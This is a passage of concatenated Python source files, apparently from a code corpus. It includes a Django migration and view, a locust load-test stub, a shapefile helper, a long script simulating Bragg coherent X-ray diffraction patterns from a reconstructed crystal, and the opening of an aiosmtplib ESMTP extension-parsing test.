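# illustrative) chaining the interfaces above with nipype's workflow engine:
#
#     import nipype.pipeline.engine as pe
#     import nipype.interfaces.mrtrix as mrt
#
#     fsl2mrtrix = pe.Node(mrt.FSL2MRTrix(), name='fsl2mrtrix')
#     csdeconv = pe.Node(mrt.ConstrainedSphericalDeconvolution(), name='csdeconv')
#     wf = pe.Workflow(name='csd_prep')
#     wf.connect(fsl2mrtrix, 'encoding_file', csdeconv, 'encoding_file')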
|
python
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright 2019, GeoSolutions Sas.
# All rights reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE.txt file in the root directory of this source tree.
#
#########################################################################
def shapefile_and_friends(path):
return {ext: path + "." + ext for ext in ['shx', 'shp', 'dbf', 'prj']}
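# Illustrative result for a hypothetical path:
#   shapefile_and_friends("/data/roads") ->
#   {'shx': '/data/roads.shx', 'shp': '/data/roads.shp',
#    'dbf': '/data/roads.dbf', 'prj': '/data/roads.prj'}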
|
python
|
# Generated by Django 2.2.13 on 2020-11-10 08:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('studygroups', '0139_team_subtitle'),
]
operations = [
migrations.AlterField(
model_name='team',
name='subtitle',
field=models.CharField(default='Join your neighbors to learn something together. Learning circles meet weekly for 6-8 weeks, and are free to join.', max_length=256),
),
]
|
python
|
import time
from locust import HttpUser, between, task
class QuickstartUser(HttpUser):
wait_time = between(1, 2)
@task
def get_users(self):
self.client.get("/api/users/")
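# Typically exercised through the locust CLI (file name and host are placeholders):
#   locust -f locustfile.py --host https://example.com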
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# BCDI: tools for pre(post)-processing Bragg coherent X-ray diffraction imaging data
# (c) 07/2017-06/2019 : CNRS UMR 7344 IM2NP
# (c) 07/2019-present : DESY PHOTON SCIENCE
# authors:
# Jerome Carnis, [email protected]
import numpy as np
from numpy.random import poisson
from numpy.fft import fftn, fftshift
from matplotlib import pyplot as plt
import tkinter as tk
from tkinter import filedialog
from scipy.interpolate import RegularGridInterpolator
import gc
import os
import sys
import bcdi.graph.graph_utils as gu
from bcdi.experiment.detector import create_detector
from bcdi.experiment.setup import Setup
import bcdi.postprocessing.postprocessing_utils as pu
import bcdi.simulation.simulation_utils as simu
import bcdi.utils.utilities as util
helptext = """
Using a support created from a reconstructed object (real space), calculate the
diffraction pattern depending on several parameters: detector size, detector distance,
presence/width of a detector gap, Poisson noise, user-defined phase.
The provided reconstructed object is expected to be orthogonalized, in the laboratory
frame.
"""
scan = 2227 # spec scan number
datadir = "C:/Users/Jerome/Documents/data/BCDI_isosurface/S" + str(scan) + "/test/"
# "D:/data/BCDI_isosurface/S"+str(scan)+"/test/"
original_sdd = 0.50678 # 1.0137
# in m, sample to detector distance of the provided reconstruction
simulated_sdd = (
0.50678 # in m, sample to detector distance for the simulated diffraction pattern
)
sdd_change_mode = "real_space" # 'real_space' or 'reciprocal_space',
# for compensating the detector distance change
# in real_space, it will interpolate the support
# if 'reciprocal_space', it will interpolate the diffraction calculated on pad_size
energy = 9000.0 - 6 # x-ray energy in eV, 6eV offset at ID01
voxel_size = 3
# in nm, voxel size of the reconstruction, should be equal in each direction
photon_threshold = 0 # 0.75
photon_number = (
5e7 # * 1011681 / 469091 # total number of photons in the array, usually around 5e7
)
pad_ortho = False # True to pad before interpolating into detector frame,
# False after (saves memory)
# True is the only choice if the compensated object is larger than the original
# array shape (it gets truncated)
orthogonal_frame = (
False # set to False to interpolate the diffraction pattern in the detector frame
)
rotate_crystal = (
True # if True, the crystal will be rotated as it was during the experiment
)
support_threshold = 0.24 # threshold for support determination
beamline = "ID01" # name of the beamline, used for orthogonalisation
# supported beamlines: 'ID01', 'SIXS_2018', 'SIXS_2019', 'CRISTAL', 'P10'
beam_direction = np.array([1, 0, 0]) # incident beam along z
rocking_angle = "outofplane" # "outofplane" or "inplane"
outofplane_angle = 35.3240 # detector delta ID01
inplane_angle = -1.6029 # detector nu ID01
grazing_angle = 0 # in degrees, incident angle for in-plane rocking curves (eta ID01)
tilt_angle = 0.0102 # angular step size for rocking angle, eta ID01
detector = "Maxipix" # "Eiger2M", "Maxipix", "Eiger4M", "Merlin", "Timepix" or "Dummy"
set_gap = True
# set to True if you want to use the detector gap in the simulation (updates the mask)
gap_width = 6 # number of pixels to mask
gap_pixel_start = 550
flat_phase = True # set to True to use a phase flat (0 everywhere)
include_noise = False # set to True to include poisson noise on the data
original_size = [
400,
400,
400,
] # size of the FFT array before binning.
# It will be modified to take into account binning
# during phasing automatically. Leave it to () if the shape did not change.
binning = (1, 1, 1) # binning factor during phasing
pad_size = [
1000,
1000,
1000,
] # will pad the array by this amount of zeroed pixels in z, y, x at both ends
# if only a number (e.g. 3), will pad to get three times the initial array size
# ! max size ~ [800, 800, 800]
crop_size = [300, 300, 300] # will crop the array to this size
ref_axis_outplane = "y" # "y" # "z" # q is supposed to be aligned along that axis
# before rotating back (nexus)
phase_range = np.pi # for plots
strain_range = 0.001 # for plots
debug = False # True to see all plots
save_fig = True # if True save figures
save_data = True # if True save data as npz and VTK
comment = "" # should start with _
##################################
# end of user-defined parameters #
##################################
###################
# define colormap #
###################
bad_color = "1.0" # white background
colormap = gu.Colormap(bad_color=bad_color)
my_cmap = colormap.cmap
################
# define setup #
################
detector = create_detector(name=detector)
setup = Setup(
beamline=beamline,
detector=detector,
energy=energy,
outofplane_angle=outofplane_angle,
inplane_angle=inplane_angle,
tilt_angle=tilt_angle,
rocking_angle=rocking_angle,
grazing_angle=grazing_angle,
distance=original_sdd,
)
#########################
# load a reconstruction #
#########################
plt.ion()
root = tk.Tk()
root.withdraw()
file_path = filedialog.askopenfilename(initialdir=datadir, filetypes=[("NPZ", "*.npz")])
npzfile = np.load(file_path)
amp = npzfile["amp"]
gu.multislices_plot(
amp,
sum_frames=False,
plot_colorbar=False,
vmin=0,
vmax=1,
cmap=my_cmap,
title="Input amplitude",
)
#################################
# pad data to the original size #
#################################
print("Initial data size:", amp.shape)
if len(original_size) == 0:
original_size = amp.shape
print("FFT size before accounting for binning", original_size)
original_size = tuple(
[original_size[index] // binning[index] for index in range(len(binning))]
)
print("Binning used during phasing:", binning)
print("Padding back to original FFT size", original_size, "\n")
amp = util.crop_pad(array=amp, output_shape=original_size)
nz, ny, nx = amp.shape
##########################################################
# calculate q for later regridding in the detector frame #
##########################################################
kin = (
2 * np.pi / setup.wavelength * beam_direction
) # in laboratory frame z downstream, y vertical, x outboard
kout = (
setup.exit_wavevector()
) # in laboratory frame z downstream, y vertical, x outboard
q = kout - kin
Qnorm = np.linalg.norm(q)
q = q / Qnorm
Qnorm = Qnorm * 1e-10 # switch to angstroms
planar_dist = 2 * np.pi / Qnorm # Qnorm should be in angstroms
print("Wavevector transfer [z, y, x]:", q * Qnorm)
print("Wavevector transfer: (angstroms)", str("{:.4f}".format(Qnorm)))
print(
"Interplanar distance: (angstroms)", str("{:.4f}".format(planar_dist)), "angstroms"
)
planar_dist = planar_dist / 10 # switch to nm
#########################################
# define the support and impose a phase #
#########################################
support = np.ones((nz, ny, nx))
if flat_phase:
phase = np.zeros((nz, ny, nx))
else:
comment = comment + "_phase"
# model for paper about artefacts in BCDI
oscillation_period = 100 # in pixels
z, y, x = np.meshgrid(
np.cos(np.arange(-nz // 2, nz // 2, 1) * 2 * np.pi / oscillation_period),
np.cos(np.arange(-ny // 2, ny // 2, 1) * 2 * np.pi / oscillation_period),
np.cos(np.arange(-nx // 2, nx // 2, 1) * 2 * np.pi / oscillation_period),
indexing="ij",
)
phase = z + y + x
if debug and not flat_phase:
gu.multislices_plot(
phase,
sum_frames=False,
plot_colorbar=True,
width_z=200,
width_y=200,
width_x=200,
vmin=-phase_range,
vmax=phase_range,
cmap=my_cmap,
title="Phase before wrapping\n",
)
phase = util.wrap(phase, start_angle=-np.pi, range_angle=2 * np.pi)
support[abs(amp) < support_threshold * abs(amp).max()] = 0
del amp
volume = support.sum() * voxel_size ** 3 # in nm3
print("estimated volume", volume, " nm3")
phase[support == 0] = 0
if ref_axis_outplane == "x":
_, _, strain = np.gradient(
planar_dist / (2 * np.pi) * phase, voxel_size
) # q is along x after rotating the crystal
elif ref_axis_outplane == "y":
_, strain, _ = np.gradient(
planar_dist / (2 * np.pi) * phase, voxel_size
) # q is along y after rotating the crystal
elif ref_axis_outplane == "z":
strain, _, _ = np.gradient(
planar_dist / (2 * np.pi) * phase, voxel_size
    ) # q is along z after rotating the crystal
else: # default is ref_axis_outplane = "y"
_, strain, _ = np.gradient(
planar_dist / (2 * np.pi) * phase, voxel_size
) # q is along y after rotating the crystal
# remove the outer layer of support for saving, because strain is undefined there
coordination_matrix = pu.calc_coordination(support, debugging=debug)
surface = np.copy(support)
surface[coordination_matrix > 23] = 0 # remove the bulk 22
bulk = support - surface
bulk[np.nonzero(bulk)] = 1
if debug and not flat_phase:
gu.multislices_plot(
surface,
sum_frames=False,
plot_colorbar=False,
width_z=200,
width_y=200,
width_x=200,
vmin=0,
vmax=1,
cmap=my_cmap,
title="surface",
)
surface = np.multiply(surface, strain)
gu.multislices_plot(
surface,
sum_frames=False,
plot_colorbar=True,
width_z=200,
width_y=200,
width_x=200,
vmin=-strain_range,
vmax=strain_range,
cmap=my_cmap,
title="surface strain",
)
gu.multislices_plot(
support,
sum_frames=True,
plot_colorbar=False,
cmap=my_cmap,
title="Orthogonal support\n",
)
gu.multislices_plot(
phase,
sum_frames=False,
plot_colorbar=True,
width_z=200,
width_y=200,
width_x=200,
vmin=-phase_range,
vmax=phase_range,
cmap=my_cmap,
title="Orthogonal phase",
)
strain[bulk == 0] = 0 # for easier visualization
if save_fig:
plt.savefig(
datadir
+ "S"
+ str(scan)
+ "_phase_"
+ str("{:.0e}".format(photon_number))
+ comment
+ ".png"
)
if save_data:
np.savez_compressed(
datadir + "S" + str(scan) + "_amp-phase-strain_SIMU" + comment,
amp=support,
phase=phase,
bulk=bulk,
strain=strain,
)
# save amp & phase to VTK
# in VTK, x is downstream, y vertical, z inboard,
# thus need to flip the last axis
gu.save_to_vti(
filename=os.path.join(
datadir, "S" + str(scan) + "_amp-phase-strain_SIMU" + comment + ".vti"
),
voxel_size=(voxel_size, voxel_size, voxel_size),
tuple_array=(support, bulk, phase, strain),
tuple_fieldnames=("amp", "bulk", "phase", "strain"),
amplitude_threshold=0.01,
)
gu.multislices_plot(
strain,
sum_frames=False,
plot_colorbar=True,
width_z=200,
width_y=200,
width_x=200,
vmin=-strain_range,
vmax=strain_range,
cmap=my_cmap,
title="strain",
)
if save_fig:
plt.savefig(
datadir
+ "S"
+ str(scan)
+ "_strain_"
+ str("{:.0e}".format(photon_number))
+ comment
+ ".png"
)
del strain, bulk, surface, coordination_matrix
gc.collect()
##############################################################################
# rotate the object to have q in the same direction as during the experiment #
##############################################################################
if rotate_crystal:
print("\nRotating the crystal to match experimental conditions")
if ref_axis_outplane == "x":
myaxis = np.array([1, 0, 0]) # must be in [x, y, z] order
elif ref_axis_outplane == "y":
myaxis = np.array([0, 1, 0]) # must be in [x, y, z] order
elif ref_axis_outplane == "z":
myaxis = np.array([0, 0, 1]) # must be in [x, y, z] order
else:
ref_axis_outplane = "y"
myaxis = np.array([0, 1, 0]) # must be in [x, y, z] order
print("Q aligned along ", ref_axis_outplane, ":", myaxis)
angle = simu.angle_vectors(
ref_vector=np.array([q[2], q[1], q[0]]) / np.linalg.norm(q), test_vector=myaxis
)
print("Angle between q and", ref_axis_outplane, "=", angle, "deg")
print("Angle with y in zy plane", np.arctan(q[0] / q[1]) * 180 / np.pi, "deg")
print("Angle with y in xy plane", np.arctan(-q[2] / q[1]) * 180 / np.pi, "deg")
print("Angle with z in xz plane", 180 + np.arctan(q[2] / q[0]) * 180 / np.pi, "deg")
support, phase = util.rotate_crystal(
arrays=(support, phase),
axis_to_align=myaxis,
debugging=(True, False),
title=("support", "phase"),
reference_axis=np.array([q[2], q[1], q[0]]) / np.linalg.norm(q),
)
original_obj = support * np.exp(1j * phase)
del phase, support
gc.collect()
###################################################
# compensate padding in order to keep reciprocal #
# space resolution (detector pixel size) constant #
###################################################
# compensate padding in real space
print("\nOriginal voxel size", voxel_size, "nm")
dqz = 2 * np.pi / (nz * voxel_size * 10) # in inverse angstroms
dqy = 2 * np.pi / (ny * voxel_size * 10) # in inverse angstroms
dqx = 2 * np.pi / (nx * voxel_size * 10) # in inverse angstroms
print(
"Original reciprocal space resolution (z, y, x): (",
str("{:.5f}".format(dqz)),
"A-1,",
str("{:.5f}".format(dqy)),
"A-1,",
str("{:.5f}".format(dqx)),
"A-1 )",
)
print(
"Original q range (z, y, x): (",
str("{:.5f}".format(dqz * nz)),
"A-1,",
str("{:.5f}".format(dqy * ny)),
"A-1,",
str("{:.5f}".format(dqx * nx)),
"A-1 )\n",
)
dqz_pad = 2 * np.pi / (pad_size[0] * voxel_size * 10) # in inverse angstroms
dqy_pad = 2 * np.pi / (pad_size[1] * voxel_size * 10) # in inverse angstroms
dqx_pad = 2 * np.pi / (pad_size[2] * voxel_size * 10) # in inverse angstroms
print(
"Reciprocal space resolution (z, y, x) after padding: (",
str("{:.5f}".format(dqz_pad)),
"A-1,",
str("{:.5f}".format(dqy_pad)),
"A-1,",
str("{:.5f}".format(dqx_pad)),
"A-1 )",
)
print(
"q range after padding (z, y, x): (",
str("{:.5f}".format(dqz_pad * pad_size[0])),
"A-1,",
str("{:.5f}".format(dqy_pad * pad_size[1])),
"A-1,",
str("{:.5f}".format(dqx_pad * pad_size[2])),
"A-1 )\n",
)
voxelsize_z = 2 * np.pi / (pad_size[0] * dqz_pad * 10) # in nm
voxelsize_y = 2 * np.pi / (pad_size[1] * dqy_pad * 10) # in nm
voxelsize_x = 2 * np.pi / (pad_size[2] * dqx_pad * 10) # in nm
print(
"Real-space voxel sizes (z, y, x) after padding: (",
str("{:.2f}".format(voxelsize_z)),
"nm,",
str("{:.2f}".format(voxelsize_y)),
"nm,",
str("{:.2f}".format(voxelsize_x)),
"nm )",
)
print("Padding has no effect on real-space voxel size.\n")
print(
"Interpolating the object to keep the q resolution constant "
"(i.e. the detector pixel size constant)."
)
print("Multiplication factor for the real-space voxel size: pad_size/original_size")
# compensate change in detector distance
comment = comment + "_sdd_" + str("{:.2f}".format(simulated_sdd))
print("\nCurrent detector pixel size", detector.unbinned_pixel_size[0] * 1e6, "um")
print(
"Detector pixel size to compensate the change in detector distance",
str(
"{:.2f}".format(
detector.unbinned_pixel_size[0] * 1e6 * original_sdd / simulated_sdd
)
),
"um",
)
print(
"Reciprocal space resolution before detector distance change (z, y, x): (",
str("{:.5f}".format(dqz)),
"A-1,",
str("{:.5f}".format(dqy)),
"A-1,",
str("{:.5f}".format(dqx)),
"A-1 )",
)
print(
"q range before detector distance change (z, y, x): (",
str("{:.5f}".format(dqz * nz)),
"A-1,",
str("{:.5f}".format(dqy * ny)),
"A-1,",
str("{:.5f}".format(dqx * nx)),
"A-1 )",
)
voxelsize_z = 2 * np.pi / (nz * dqz * 10) # in nm
voxelsize_y = 2 * np.pi / (ny * dqy * 10) # in nm
voxelsize_x = 2 * np.pi / (nx * dqx * 10) # in nm
print(
"Real-space voxel sizes before detector distance change (z, y, x): (",
str("{:.2f}".format(voxelsize_z)),
"nm,",
str("{:.2f}".format(voxelsize_y)),
"nm,",
str("{:.2f}".format(voxelsize_x)),
"nm )\n",
)
dqz_simu, dqy_simu, dqx_simu = (
dqz * original_sdd / simulated_sdd,
dqy * original_sdd / simulated_sdd,
dqx * original_sdd / simulated_sdd,
)
print(
"Reciprocal space resolution after detector distance change (z, y, x): (",
str("{:.5f}".format(dqz_simu)),
"A-1,",
str("{:.5f}".format(dqy_simu)),
"A-1,",
str("{:.5f}".format(dqx_simu)),
"A-1 )",
)
print(
"q range after detector distance change (z, y, x): (",
str("{:.5f}".format(dqz_simu * nz)),
"A-1,",
str("{:.5f}".format(dqy_simu * ny)),
"A-1,",
str("{:.5f}".format(dqx_simu * nx)),
"A-1 )",
)
voxelsize_z = 2 * np.pi / (nz * dqz_simu * 10) # in nm
voxelsize_y = 2 * np.pi / (ny * dqy_simu * 10) # in nm
voxelsize_x = 2 * np.pi / (nx * dqx_simu * 10) # in nm
print(
"Real-space voxel sizes after detector distance change (z, y, x): (",
str("{:.2f}".format(voxelsize_z)),
"nm,",
str("{:.2f}".format(voxelsize_y)),
"nm,",
str("{:.2f}".format(voxelsize_x)),
"nm )\n",
)
# interpolate the support
if pad_ortho: # pad before interpolating into detector frame
# this is the only choice if the compensated object is larger
# than the initial array shape
print(
"Padding to data size: ",
pad_size,
" before interpolating into the detector frame",
)
nz_interp = pad_size[0]
ny_interp = pad_size[1]
nx_interp = pad_size[2]
if pad_size[0] < nz or pad_size[1] < ny or pad_size[2] < nx:
print("Pad size smaller than initial array size")
sys.exit()
original_obj = util.crop_pad(original_obj, pad_size)
else: # pad after interpolating into detector frame - saves memory
nz_interp = nz
ny_interp = ny
nx_interp = nx
newz, newy, newx = np.meshgrid(
np.arange(-nz_interp // 2, nz_interp // 2, 1) * voxel_size,
np.arange(-ny_interp // 2, ny_interp // 2, 1) * voxel_size,
np.arange(-nx_interp // 2, nx_interp // 2, 1) * voxel_size,
indexing="ij",
)
if sdd_change_mode == "real_space":
    print(
        "Interpolating the real-space object to accommodate "
"the change in detector distance."
)
print(
"Multiplication factor for the real-space voxel size: "
"original_sdd / simulated_sdd\n"
)
# if the detector is 2 times farther away, the pixel size is two times smaller
# (2 times better sampling) hence the q range is two times smaller and the
# real-space voxel size two times larger
rgi = RegularGridInterpolator(
(
np.arange(-nz_interp // 2, nz_interp // 2)
* voxel_size
* pad_size[0]
/ nz_interp
* original_sdd
/ simulated_sdd,
np.arange(-ny_interp // 2, ny_interp // 2)
* voxel_size
* pad_size[1]
/ ny_interp
* original_sdd
/ simulated_sdd,
np.arange(-nx_interp // 2, nx_interp // 2)
* voxel_size
* pad_size[2]
/ nx_interp
* original_sdd
/ simulated_sdd,
),
original_obj,
method="linear",
bounds_error=False,
fill_value=0,
)
else: # 'reciprocal_space'
rgi = RegularGridInterpolator(
(
np.arange(-nz_interp // 2, nz_interp // 2)
* voxel_size
* pad_size[0]
/ nz_interp,
np.arange(-ny_interp // 2, ny_interp // 2)
* voxel_size
* pad_size[1]
/ ny_interp,
np.arange(-nx_interp // 2, nx_interp // 2)
* voxel_size
* pad_size[2]
/ nx_interp,
),
original_obj,
method="linear",
bounds_error=False,
fill_value=0,
)
obj = rgi(
np.concatenate(
(
newz.reshape((1, newz.size)),
newy.reshape((1, newz.size)),
newx.reshape((1, newz.size)),
)
).transpose()
)
del newx, newy, newz, rgi
gc.collect()
obj = obj.reshape((nz_interp, ny_interp, nx_interp)).astype(original_obj.dtype)
if debug:
gu.multislices_plot(
abs(obj),
sum_frames=True,
cmap=my_cmap,
title="Orthogonal support interpolated for \npadding & detector distance "
"change compensation\n",
)
if orthogonal_frame:
data = fftshift(abs(fftn(original_obj)) ** 2)
data = data / data.sum() * photon_number # convert into photon number
gu.multislices_plot(
data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-5,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT before padding & detector distance change\n",
)
del original_obj, data
gc.collect()
else:
del original_obj
gc.collect()
###################################################
# interpolate the object back into detector frame #
###################################################
if not orthogonal_frame:
if debug:
original_obj = setup.detector_frame(
obj=original_obj,
voxel_size=voxel_size,
debugging=debug,
title="Original object",
)
data = fftshift(abs(fftn(original_obj)) ** 2)
gu.multislices_plot(
data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-5,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT before padding & detector distance change\n",
)
del original_obj, data
gc.collect()
obj = setup.detector_frame(
obj=obj, voxel_size=voxel_size, debugging=debug, title="Rescaled object"
)
#################################################################
# uncomment this if you want to save the non-orthogonal support #
# in that case pad_size and crop_size should be identical #
#################################################################
# support = abs(obj)
# support = support / support.max()
# support[support < 0.05] = 0
# support[np.nonzero(support)] = 1
# np.savez_compressed(datadir + 'S' + str(scan) +
# 'support_nonortho400.npz', obj=support)
##############################################################
# pad the array (after interpolation because of memory cost) #
##############################################################
if not pad_ortho:
print(
"Padding to data size: ",
pad_size,
" after interpolating into the detector frame",
)
if pad_size[0] < nz or pad_size[1] < ny or pad_size[2] < nx:
print("Pad size smaller than initial array size")
sys.exit()
newobj = util.crop_pad(obj, pad_size)
else:
newobj = obj
nz, ny, nx = newobj.shape
comment = comment + "_pad_" + str(nz) + "," + str(ny) + "," + str(nx)
del obj
gc.collect()
gu.multislices_plot(
abs(newobj), sum_frames=True, cmap=my_cmap, title="Support before FFT calculation"
)
if save_fig:
plt.savefig(
datadir + "S" + str(scan) + "_support_before_FFT" + comment + "_sum.png"
)
###########################################
# normalize and apply amplitude threshold #
###########################################
newobj = newobj / abs(newobj).max()
newobj[abs(newobj) < support_threshold] = 0
#####################################
# calculate the diffraction pattern #
#####################################
data = fftshift(abs(fftn(newobj)) ** 2)
gu.multislices_plot(
data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-5,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT on the padded object\n",
)
del newobj
gc.collect()
#################################################################################
# interpolate the diffraction pattern to accomodate change in detector distance #
#################################################################################
if (sdd_change_mode == "reciprocal_space") and (original_sdd != simulated_sdd):
    print(
        "Interpolating the diffraction pattern to accommodate "
"the change in detector distance."
)
print(
"Multiplication factor for the detector pixel size: "
"simulated_sdd/original_sdd\n"
)
# if the detector is 2 times farther away,
# the pixel size is two times smaller (2 times better sampling)
# and the q range is two times smaller
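    # worked example: with simulated_sdd = 2 * original_sdd, each pixel spans half the
    # original q step (dq_simu = dq / 2), so the unchanged number of pixels covers half
    # the original q range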
newz, newy, newx = np.meshgrid(
np.arange(-nz // 2, nz // 2, 1) * dqz,
np.arange(-ny // 2, ny // 2, 1) * dqy,
np.arange(-nx // 2, nx // 2, 1) * dqx,
indexing="ij",
)
rgi = RegularGridInterpolator(
(
np.arange(-nz // 2, nz // 2) * dqz * simulated_sdd / original_sdd,
np.arange(-ny // 2, ny // 2) * dqy * simulated_sdd / original_sdd,
np.arange(-nx // 2, nx // 2) * dqx * simulated_sdd / original_sdd,
),
data,
method="linear",
bounds_error=False,
fill_value=0,
)
simu_data = rgi(
np.concatenate(
(
newz.reshape((1, newz.size)),
newy.reshape((1, newz.size)),
newx.reshape((1, newz.size)),
)
).transpose()
)
del newx, newy, newz, rgi
gc.collect()
simu_data = simu_data.reshape((nz, ny, nx)).astype(data.dtype)
gu.multislices_plot(
simu_data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-5,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT for simulated detector distance\n",
)
else:
simu_data = data
del data
gc.collect()
#######################################################
# convert into photons and apply the photon threshold #
#######################################################
simu_data = simu_data / simu_data.sum() * photon_number # convert into photon number
mask = np.zeros((nz, ny, nx))
mask[simu_data <= photon_threshold] = 1
simu_data[simu_data <= photon_threshold] = 0
temp_data = np.rint(simu_data).astype(int)
filled_pixels = (temp_data != 0).sum()
print("Number of pixels filled with non-zero intensity= ", filled_pixels)
del temp_data
gc.collect()
gu.multislices_plot(
simu_data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-5,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT converted into photons\n",
)
if save_fig:
plt.savefig(
datadir
+ "S"
+ str(scan)
+ "_diff_float_"
+ str("{:.0e}".format(photon_number))
+ comment
+ "_sum.png"
)
#########################
# include Poisson noise #
#########################
if include_noise:
simu_data = np.rint(poisson(simu_data)).astype(int)
comment = comment + "_noise"
else:
simu_data = np.rint(simu_data).astype(int)
#####################
# add detector gaps #
#####################
if set_gap:
comment = comment + "_gap" + str(gap_pixel_start)
simu_data, mask = simu.gap_detector(
data=simu_data, mask=mask, start_pixel=gap_pixel_start, width_gap=gap_width
)
else:
comment = comment + "_nogap"
gu.multislices_plot(
simu_data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-1,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="FFT after rounding",
)
myfig, _, _ = gu.multislices_plot(
simu_data,
sum_frames=True,
scale="log",
plot_colorbar=True,
vmin=-1,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="Masked intensity",
)
myfig.text(0.60, 0.30, "Pad size =" + str(pad_size), size=20)
if save_fig:
myfig.savefig(
datadir
+ "S"
+ str(scan)
+ "_diff_"
+ str("{:.0e}".format(photon_number))
+ comment
+ "_sum.png"
)
#################################################
# crop arrays to obtain the final detector size #
#################################################
voxelsizez_crop = 2 * np.pi / (crop_size[0] * dqz_simu * 10) # in nm
voxelsizey_crop = 2 * np.pi / (crop_size[1] * dqy_simu * 10) # in nm
voxelsizex_crop = 2 * np.pi / (crop_size[2] * dqx_simu * 10) # in nm
print(
"Real-space voxel sizes (z, y, x) after cropping: (",
str("{:.2f}".format(voxelsizez_crop)),
"nm,",
str("{:.2f}".format(voxelsizey_crop)),
"nm,",
str("{:.2f}".format(voxelsizex_crop)),
"nm )",
)
nz, ny, nx = simu_data.shape
nz_crop, ny_crop, nx_crop = crop_size
if nz < nz_crop or ny < ny_crop or nx < nx_crop:
print("Crop size larger than initial array size")
sys.exit()
simu_data = util.crop_pad(simu_data, crop_size)
mask = util.crop_pad(mask, crop_size)
##########################################################
# crop arrays to fulfill FFT requirements during phasing #
##########################################################
nz, ny, nx = simu_data.shape
nz_crop, ny_crop, nx_crop = util.smaller_primes(
(nz, ny, nx), maxprime=7, required_dividers=(2,)
)
simu_data = util.crop_pad(simu_data, (nz_crop, ny_crop, nx_crop))
mask = util.crop_pad(mask, (nz_crop, ny_crop, nx_crop))
nz, ny, nx = simu_data.shape
print("cropped FFT data size:", simu_data.shape)
print("Total number of photons:", simu_data.sum())
comment = comment + "_crop_" + str(nz) + "," + str(ny) + "," + str(nx)
##############
# save files #
##############
if save_data:
np.savez_compressed(
datadir
+ "S"
+ str(scan)
+ "_diff_"
+ str("{:.0e}".format(photon_number))
+ comment,
data=simu_data,
)
np.savez_compressed(
datadir
+ "S"
+ str(scan)
+ "_mask_"
+ str("{:.0e}".format(photon_number))
+ comment,
mask=mask,
)
#####################################
# plot mask and diffraction pattern #
#####################################
plt.ioff()
if debug:
gu.multislices_plot(
mask,
sum_frames=True,
scale="linear",
plot_colorbar=False,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="Mask",
)
myfig, _, _ = gu.multislices_plot(
simu_data,
sum_frames=False,
scale="log",
plot_colorbar=True,
vmin=-1,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="Masked intensity",
)
myfig.text(0.60, 0.35, "Pad size =" + str(pad_size), size=20)
myfig.text(0.60, 0.30, "Crop size =" + str(crop_size), size=20)
myfig.text(0.60, 0.25, "Filled pixels =" + str(filled_pixels), size=20)
myfig.text(
0.60,
0.20,
"Detector distance =" + str("{:.5f}".format(simulated_sdd)) + " m",
size=20,
)
myfig.text(
0.60,
0.15,
"Voxel size ="
+ str("{:.2f}".format(voxelsizez_crop))
+ ", "
+ str("{:.2f}".format(voxelsizey_crop))
+ ", "
+ str("{:.2f}".format(voxelsizex_crop))
+ " nm",
size=20,
)
myfig.text(0.60, 0.10, "Volume =" + str(volume) + " nm3", size=20)
if set_gap:
myfig.text(0.60, 0.05, "Gap width =" + str(gap_width) + " pixels", size=20)
if save_fig:
myfig.savefig(
datadir
+ "S"
+ str(scan)
+ "_diff_"
+ str("{:.0e}".format(photon_number))
+ comment
+ "_center.png"
)
myfig, _, _ = gu.multislices_plot(
simu_data,
sum_frames=True,
scale="log",
plot_colorbar=True,
vmin=-1,
cmap=my_cmap,
reciprocal_space=True,
is_orthogonal=False,
title="Masked intensity",
)
myfig.text(0.60, 0.35, "Pad size =" + str(pad_size), size=20)
myfig.text(0.60, 0.30, "Crop size =" + str(crop_size), size=20)
myfig.text(0.60, 0.25, "Filled pixels =" + str(filled_pixels), size=20)
myfig.text(
0.60,
0.20,
"Detector distance =" + str("{:.5f}".format(simulated_sdd)) + " m",
size=20,
)
myfig.text(
0.60,
0.15,
"Voxel size ="
+ str("{:.2f}".format(voxelsizez_crop))
+ ", "
+ str("{:.2f}".format(voxelsizey_crop))
+ ", "
+ str("{:.2f}".format(voxelsizex_crop))
+ " nm",
size=20,
)
myfig.text(0.60, 0.10, "Volume =" + str(volume) + " nm3", size=20)
if set_gap:
myfig.text(0.60, 0.05, "Gap width =" + str(gap_width) + " pixels", size=20)
if save_fig:
myfig.savefig(
datadir
+ "S"
+ str(scan)
+ "_diff_"
+ str("{:.0e}".format(photon_number))
+ comment
+ "_sum.png"
)
plt.show()
|
python
|
from django.shortcuts import render
from django.views.generic import View
class IndexView(View):
""" An index view"""
template_name = "base.html"
def get(self, request):
""" GET to return a simple template """
return render(
request, self.template_name
)
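# A minimal URLconf sketch (assumed app layout, not part of this module) wiring the view:
#
#     from django.urls import path
#     from .views import IndexView
#
#     urlpatterns = [
#         path("", IndexView.as_view(), name="index"),
#     ]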
|
python
|
"""
Tests for ESMTP extension parsing.
"""
from aiosmtplib.esmtp import parse_esmtp_extensions
def test_basic_extension_parsing():
response = """size.does.matter.af.MIL offers FIFTEEN extensions:
8BITMIME
PIPELINING
DSN
ENHANCEDSTATUSCODES
EXPN
HELP
SAML
SEND
SOML
TURN
XADR
XSTA
ETRN
XGEN
SIZE 51200000
"""
extensions, auth_types = parse_esmtp_extensions(response)
assert "size" in extensions
assert extensions["size"] == "51200000"
assert "saml" in extensions
assert "size.does.matter.af.mil" not in extensions
assert auth_types == []
def test_no_extension_parsing():
